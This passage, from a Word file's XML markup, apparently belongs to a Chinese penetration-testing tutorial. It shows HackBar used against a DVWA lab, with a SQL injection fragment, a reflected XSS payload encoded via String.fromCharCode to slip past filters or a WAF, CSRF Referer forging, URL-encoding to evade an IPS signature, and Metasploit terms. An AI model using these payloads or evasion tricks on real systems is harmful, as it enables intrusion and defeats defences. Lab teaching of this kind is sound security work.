      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cloumn”，然后按图中所示只保留”</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">database(),version() – </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”即可，最后点击Execute发起请求，页面就会返回数据库名称和数据库版本信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="161743B7" wp14:editId="158D7071">
            <wp:extent cx="5274310" cy="345313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453130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1F51ED" wp14:editId="4296D7C0">
            <wp:extent cx="5274310" cy="217614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76145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDFB4E5" wp14:editId="342B8E5B">
            <wp:extent cx="5274310" cy="111823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18235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="060118BF" wp14:editId="731F0923">
            <wp:extent cx="5274310" cy="90043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900430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08AE74EF" wp14:editId="27C8B9FC">
            <wp:extent cx="5200650" cy="2527068"/>
            <wp:effectExtent l="0" t="0" r="0"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05748" cy="2529545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc499884731"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在DVWA的XSS（Reflected）页面，输入lcheng，点submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A93C51F" wp14:editId="71FE2886">
            <wp:extent cx="3990476" cy="1085714"/>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90476" cy="1085714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在hackbar中load</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E659CF5" wp14:editId="5B433BA5">
            <wp:extent cx="5274310" cy="246126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461260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选中url中的lcheng字段，点击“XSS-alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>statement”，并在前后加上&lt;script&gt;和&lt;/script&gt;标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D53FE36" wp14:editId="5A4C2C37">
            <wp:extent cx="5085714" cy="1666667"/>
            <wp:effectExtent l="0" t="0" r="127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85714" cy="1666667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37492893" wp14:editId="0CA66D24">
            <wp:extent cx="5274310" cy="1046480"/>
            <wp:effectExtent l="0" t="0" r="2540"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046480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击Execute即可提交请求并返回结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B5BA78" wp14:editId="41BF76DE">
            <wp:extent cx="5274310" cy="34359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435985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在alert语句中，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>String.fromCharCode()是javascript中的字符串方法，用来把ASCII转换为字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个语句等同于alert(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>“XSS”)</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，采用 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法可以提高攻击绕过XSS过滤规则或者WAF保护的可能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc499884732"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试CSRF时主要利用到hackbar的Enable</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer选项，可以自定义http请求中的Referer头字段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6940045A" wp14:editId="57F3EB80">
            <wp:extent cx="4800000" cy="2409524"/>
            <wp:effectExtent l="0" t="0" r="63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800000" cy="2409524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439E828A" wp14:editId="3302B755">
            <wp:extent cx="5274310" cy="200850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008505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ackbar提供了多种加密和编码工具，其中一个作用就是用来测试URL编码逃逸，以ips</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sig中的一条http特征为例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A40117F" wp14:editId="56EBF1E7">
            <wp:extent cx="4428571" cy="914286"/>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28571" cy="914286"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击特征为url中包含/boot.ini字段，比如访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId351" w:history="1">
        <w:r w:rsidRPr="00EB06B9">
          <w:t>http://10.180.187.10/boot.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的行为即被认定为攻击，这条特征包含在特征库中所以攻击会被ips模块阻拦。但如果将/boot.ini编码变形，就有可能逃过引擎的扫描了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在hackbar的url栏输入</w:t>
      </w:r>
      <w:hyperlink r:id="rId352" w:history="1">
        <w:r w:rsidRPr="00EB06B9">
          <w:t>http://10.180.187.10/DVWA-1.9/boot.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后选中/boot.ini,点击Encoding-urlencode，url就完成了编码，实际测试过程中，可以根据需要进行多重编码和解码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34AC10AC" wp14:editId="48086396">
            <wp:extent cx="3933333" cy="1409524"/>
            <wp:effectExtent l="0" t="0" r="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33333" cy="1409524"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04E147D0" wp14:editId="518CB3A1">
            <wp:extent cx="4580952" cy="145714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80952" cy="1457143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc499884733"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是近年来最强大、最流行和最有发展前途的开源渗透测试平台软件，自2004年横空出世后即引起了安全社区的高度关注，Metasploit平台提供了一个包含大量通用可靠并且经常更新的渗透攻击代码库，集成了许多组件、接口和功能模块，不仅为渗透测试的初学者提供了一套简单易用、功能强大的软件，也是</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>职业渗透测试工程师的一件神器。Metasploit已经成为安全社区进行软件安全漏洞分析研究与开发的一个通用平台，安全社区中的漏洞利用程序往往以Metasploit模块方式进行发布。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>概括的讲，Metasploit可以帮助你：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现和攻击缺乏维护、配置错误和未打补丁的系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>网络侦查，获取目标系统的情报信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>集成自动漏洞发现工具nmap、neXpose、Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Meterpreter Shell 目标网络内部跳板攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>编写自己的Meterpreter后渗透攻击模块和脚本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="00832CE1">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc499884734"/>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit相关术语</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在学习使用Metasploit前，有必要了解几个专业术语，大部分术语是在Metasploit框架上下文环境中定义的，但通常含义在整个安全业界都是通用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>渗透攻击（Exploit）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用特定系统、服务、应用的安全漏洞所做的攻击行为。流行的攻击技术包括</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>缓冲区溢出、web应用程序漏洞攻击（SQL）注入等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>攻击载荷（Payload）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期望目标系统被渗透攻击后去执行的代码，shellcode是其中一种</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Shellcode是在渗透攻击时作为攻击载荷运行的一组机器指令，shellcode通常用汇编语言编写，在大多数情况下，目标系统执行了shellcode后才会提供一个命令行shell或者Meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell，这也是shellcode名称的由来。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C3F08">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>模块（Module）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>Metasploit框架中使用的一段软件代码</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组件，如渗透攻击模块exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>module、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>辅助模块</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>auxiliary module等，</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些模块</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>不断变化发展，是框架的核心</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="008C3F08" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
